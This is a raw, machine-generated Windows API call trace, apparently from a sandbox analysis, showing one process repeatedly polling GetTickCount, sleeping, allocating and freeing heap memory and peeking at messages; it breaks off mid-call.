[0066.197] GetTickCount () returned 0x1d142 [0066.198] Sleep (dwMilliseconds=0x0) [0066.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.235] GetLastError () returned 0x0 [0066.235] GetCurrentProcessId () returned 0xa44 [0066.235] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.235] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.235] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.235] GetTickCount () returned 0x1d171 [0066.235] GetTickCount () returned 0x1d171 [0066.235] GetTickCount () returned 0x1d171 [0066.235] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.235] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.235] GetTickCount () returned 0x1d171 [0066.236] Sleep (dwMilliseconds=0x0) [0066.250] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.251] GetLastError () returned 0x0 [0066.251] GetCurrentProcessId () returned 0xa44 [0066.251] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.251] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.251] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.251] GetTickCount () returned 0x1d181 [0066.251] GetTickCount () returned 0x1d181 [0066.251] GetTickCount () returned 0x1d181 [0066.251] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.251] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.251] GetTickCount () returned 0x1d181 [0066.251] Sleep (dwMilliseconds=0x0) [0066.282] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.298] GetLastError () returned 0x0 [0066.298] GetCurrentProcessId () returned 0xa44 [0066.298] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.298] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.298] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.298] GetTickCount () returned 0x1d1af [0066.298] GetTickCount () returned 0x1d1af [0066.298] GetTickCount () returned 0x1d1af [0066.298] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.298] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.298] GetTickCount () returned 0x1d1af [0066.298] Sleep (dwMilliseconds=0x0) [0066.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.300] GetLastError () returned 0x0 [0066.300] GetCurrentProcessId () returned 0xa44 [0066.300] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.300] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.300] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.300] GetTickCount () returned 0x1d1af [0066.300] GetTickCount () returned 0x1d1af [0066.300] GetTickCount () returned 0x1d1af [0066.300] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.300] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.301] GetTickCount () returned 0x1d1af [0066.301] Sleep (dwMilliseconds=0x0) [0066.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.312] GetLastError () returned 0x0 [0066.312] GetCurrentProcessId () returned 0xa44 [0066.312] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.312] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.312] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.312] GetTickCount () returned 0x1d1af [0066.312] GetTickCount () returned 0x1d1af [0066.313] GetTickCount () returned 0x1d1bf [0066.313] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.313] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.313] GetTickCount () returned 0x1d1bf [0066.313] Sleep (dwMilliseconds=0x0) [0066.313] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.313] GetLastError () returned 0x0 [0066.313] GetCurrentProcessId () returned 0xa44 [0066.313] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.313] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.313] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.313] GetTickCount () returned 0x1d1bf [0066.313] GetTickCount () returned 0x1d1bf [0066.313] GetTickCount () returned 0x1d1bf [0066.313] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.314] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.314] GetTickCount () returned 0x1d1bf [0066.314] Sleep (dwMilliseconds=0x0) [0066.314] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.314] GetLastError () returned 0x0 [0066.314] GetCurrentProcessId () returned 0xa44 [0066.314] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.314] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.314] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.314] GetTickCount () returned 0x1d1bf [0066.314] GetTickCount () returned 0x1d1bf [0066.314] GetTickCount () returned 0x1d1bf [0066.314] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.314] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.314] GetTickCount () returned 0x1d1bf [0066.314] Sleep (dwMilliseconds=0x0) [0066.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.315] GetLastError () returned 0x0 [0066.315] GetCurrentProcessId () returned 0xa44 [0066.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.315] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.315] GetTickCount () returned 0x1d1bf [0066.315] GetTickCount () returned 0x1d1bf [0066.315] GetTickCount () returned 0x1d1bf [0066.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.315] GetTickCount () returned 0x1d1bf [0066.315] Sleep (dwMilliseconds=0x0) [0066.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.315] GetLastError () returned 0x0 [0066.315] GetCurrentProcessId () returned 0xa44 [0066.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.315] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.316] GetTickCount () returned 0x1d1bf [0066.316] GetTickCount () returned 0x1d1bf [0066.316] GetTickCount () returned 0x1d1bf [0066.316] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.316] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.316] GetTickCount () returned 0x1d1bf [0066.316] Sleep (dwMilliseconds=0x0) [0066.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.316] GetLastError () returned 0x0 [0066.316] GetCurrentProcessId () returned 0xa44 [0066.316] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.316] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.316] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.316] GetTickCount () returned 0x1d1bf [0066.316] GetTickCount () returned 0x1d1bf [0066.316] GetTickCount () returned 0x1d1bf [0066.316] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.316] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.316] GetTickCount () returned 0x1d1bf [0066.317] Sleep (dwMilliseconds=0x0) [0066.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.317] GetLastError () returned 0x0 [0066.317] GetCurrentProcessId () returned 0xa44 [0066.317] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.317] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.317] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.317] GetTickCount () returned 0x1d1bf [0066.317] GetTickCount () returned 0x1d1bf [0066.317] GetTickCount () returned 0x1d1bf [0066.317] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.317] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.317] GetTickCount () returned 0x1d1bf [0066.317] Sleep (dwMilliseconds=0x0) [0066.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.317] GetLastError () returned 0x0 [0066.318] GetCurrentProcessId () returned 0xa44 [0066.318] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.318] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.318] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.318] GetTickCount () returned 0x1d1bf [0066.318] GetTickCount () returned 0x1d1bf [0066.318] GetTickCount () returned 0x1d1bf [0066.318] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.318] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.318] GetTickCount () returned 0x1d1bf [0066.318] Sleep (dwMilliseconds=0x0) [0066.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.318] GetLastError () returned 0x0 [0066.318] GetCurrentProcessId () returned 0xa44 [0066.318] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.318] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.318] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.318] GetTickCount () returned 0x1d1bf [0066.318] GetTickCount () returned 0x1d1bf [0066.318] GetTickCount () returned 0x1d1bf [0066.318] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.319] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.319] GetTickCount () returned 0x1d1bf [0066.319] Sleep (dwMilliseconds=0x0) [0066.319] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.319] GetLastError () returned 0x0 [0066.319] GetCurrentProcessId () returned 0xa44 [0066.319] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.319] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.319] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.319] GetTickCount () returned 0x1d1bf [0066.319] GetTickCount () returned 0x1d1bf [0066.319] GetTickCount () returned 0x1d1bf [0066.319] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.319] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.319] GetTickCount () returned 0x1d1bf [0066.319] Sleep (dwMilliseconds=0x0) [0066.319] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.320] GetLastError () returned 0x0 [0066.320] GetCurrentProcessId () returned 0xa44 [0066.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.320] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.320] GetTickCount () returned 0x1d1bf [0066.320] GetTickCount () returned 0x1d1bf [0066.320] GetTickCount () returned 0x1d1bf [0066.320] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.320] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.320] GetTickCount () returned 0x1d1bf [0066.320] Sleep (dwMilliseconds=0x0) [0066.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.320] GetLastError () returned 0x0 [0066.320] GetCurrentProcessId () returned 0xa44 [0066.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.320] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.320] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.321] GetTickCount () returned 0x1d1bf [0066.321] GetTickCount () returned 0x1d1bf [0066.321] GetTickCount () returned 0x1d1bf [0066.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.321] GetTickCount () returned 0x1d1bf [0066.321] Sleep (dwMilliseconds=0x0) [0066.321] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.321] GetLastError () returned 0x0 [0066.321] GetCurrentProcessId () returned 0xa44 [0066.321] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.321] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.321] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.321] GetTickCount () returned 0x1d1bf [0066.321] GetTickCount () returned 0x1d1bf [0066.321] GetTickCount () returned 0x1d1bf [0066.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.321] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.321] GetTickCount () returned 0x1d1bf [0066.322] Sleep (dwMilliseconds=0x0) [0066.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.322] GetLastError () returned 0x0 [0066.322] GetCurrentProcessId () returned 0xa44 [0066.322] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.322] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.322] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.322] GetTickCount () returned 0x1d1bf [0066.322] GetTickCount () returned 0x1d1bf [0066.322] GetTickCount () returned 0x1d1bf [0066.322] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.322] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.322] GetTickCount () returned 0x1d1bf [0066.322] Sleep (dwMilliseconds=0x0) [0066.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.322] GetLastError () returned 0x0 [0066.323] GetCurrentProcessId () returned 0xa44 [0066.323] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.323] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.323] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.323] GetTickCount () returned 0x1d1bf [0066.323] GetTickCount () returned 0x1d1bf [0066.323] GetTickCount () returned 0x1d1bf [0066.323] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.323] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.323] GetTickCount () returned 0x1d1bf [0066.323] Sleep (dwMilliseconds=0x0) [0066.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.323] GetLastError () returned 0x0 [0066.323] GetCurrentProcessId () returned 0xa44 [0066.323] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.323] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.323] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.323] GetTickCount () returned 0x1d1bf [0066.323] GetTickCount () returned 0x1d1bf [0066.323] GetTickCount () returned 0x1d1bf [0066.324] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.324] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.324] GetTickCount () returned 0x1d1bf [0066.324] Sleep (dwMilliseconds=0x0) [0066.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.324] GetLastError () returned 0x0 [0066.324] GetCurrentProcessId () returned 0xa44 [0066.324] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.324] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.324] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.324] GetTickCount () returned 0x1d1bf [0066.324] GetTickCount () returned 0x1d1bf [0066.324] GetTickCount () returned 0x1d1bf [0066.324] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.324] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.324] GetTickCount () returned 0x1d1bf [0066.324] Sleep (dwMilliseconds=0x0) [0066.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.325] GetLastError () returned 0x0 [0066.325] GetCurrentProcessId () returned 0xa44 [0066.325] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.325] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.325] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.325] GetTickCount () returned 0x1d1bf [0066.325] GetTickCount () returned 0x1d1bf [0066.325] GetTickCount () returned 0x1d1bf [0066.325] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.325] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.325] GetTickCount () returned 0x1d1bf [0066.325] Sleep (dwMilliseconds=0x0) [0066.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.325] GetLastError () returned 0x0 [0066.325] GetCurrentProcessId () returned 0xa44 [0066.325] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.325] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.326] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.326] GetTickCount () returned 0x1d1bf [0066.326] GetTickCount () returned 0x1d1bf [0066.326] GetTickCount () returned 0x1d1bf [0066.326] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.326] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.326] GetTickCount () returned 0x1d1bf [0066.326] Sleep (dwMilliseconds=0x0) [0066.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.326] GetLastError () returned 0x0 [0066.326] GetCurrentProcessId () returned 0xa44 [0066.326] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.326] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.326] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.326] GetTickCount () returned 0x1d1bf [0066.326] GetTickCount () returned 0x1d1bf [0066.326] GetTickCount () returned 0x1d1bf [0066.326] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.326] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.326] GetTickCount () returned 0x1d1bf [0066.327] Sleep (dwMilliseconds=0x0) [0066.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.327] GetLastError () returned 0x0 [0066.327] GetCurrentProcessId () returned 0xa44 [0066.327] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.327] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.327] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.327] GetTickCount () returned 0x1d1bf [0066.327] GetTickCount () returned 0x1d1bf [0066.327] GetTickCount () returned 0x1d1bf [0066.327] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.327] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.327] GetTickCount () returned 0x1d1bf [0066.327] Sleep (dwMilliseconds=0x0) [0066.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.327] GetLastError () returned 0x0 [0066.328] GetCurrentProcessId () returned 0xa44 [0066.328] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.328] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.328] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.328] GetTickCount () returned 0x1d1bf [0066.328] GetTickCount () returned 0x1d1bf [0066.328] GetTickCount () returned 0x1d1bf [0066.328] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.328] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.328] GetTickCount () returned 0x1d1bf [0066.328] Sleep (dwMilliseconds=0x0) [0066.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.328] GetLastError () returned 0x0 [0066.328] GetCurrentProcessId () returned 0xa44 [0066.328] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.328] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.328] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.328] GetTickCount () returned 0x1d1bf [0066.329] GetTickCount () returned 0x1d1bf [0066.329] GetTickCount () returned 0x1d1bf [0066.329] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.329] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.329] GetTickCount () returned 0x1d1bf [0066.329] Sleep (dwMilliseconds=0x0) [0066.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.329] GetLastError () returned 0x0 [0066.329] GetCurrentProcessId () returned 0xa44 [0066.329] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.329] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.329] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.329] GetTickCount () returned 0x1d1bf [0066.329] GetTickCount () returned 0x1d1bf [0066.329] GetTickCount () returned 0x1d1bf [0066.329] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.329] HeapFree (in: 